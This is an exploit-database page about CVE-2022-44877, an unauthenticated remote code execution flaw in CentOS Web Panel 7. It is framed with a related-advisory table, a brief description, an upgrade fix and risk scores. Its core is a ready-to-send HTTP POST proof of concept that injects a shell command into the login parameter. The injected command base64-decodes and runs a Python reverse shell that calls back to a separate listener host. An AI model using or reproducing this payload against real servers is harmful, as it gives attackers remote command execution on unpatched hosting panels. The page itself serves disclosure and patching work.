Vulners
Lucene search
Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Control Web Panel 7 Remote Code Execution Vulnerability | 10 Jan 202300:00 | – | zdt |
| Control Web Panel Unauthenticated Remote Command Execution Exploit | 31 Jan 202300:00 | – | zdt |
| Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution Vulnerability | 2 Apr 202300:00 | – | zdt |
| Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution Exploit | 5 Apr 202300:00 | – | zdt |
 | CVE-2022-44877 | 5 Jan 202300:00 | – | attackerkb |
 | Exploit for OS Command Injection in Control-Webpanel Webpanel | 15 Feb 202315:22 | – | githubexploit |
 | CVE-2022-44877 | 5 Jan 202319:40 | – | circl |
 | CWP Control Web Panel OS Command Injection Vulnerability | 17 Jan 202300:00 | – | cisa_kev |
 | CentOS Web Panel 操作系统命令注入漏洞 | 5 Jan 202300:00 | – | cnnvd |
 | CVE-2022-44877 | 5 Jan 202300:00 | – | cve |
10
[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
--------------
Bash commands can be run because double quotes are used to log incorrect entries to the system.
Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
username=root&password=toor&commit=Login
--------------
Solution
--------
Upgrade to CWP7 current versionData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Apr 2023 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 3.19.8
EPSS0.94457
SSVC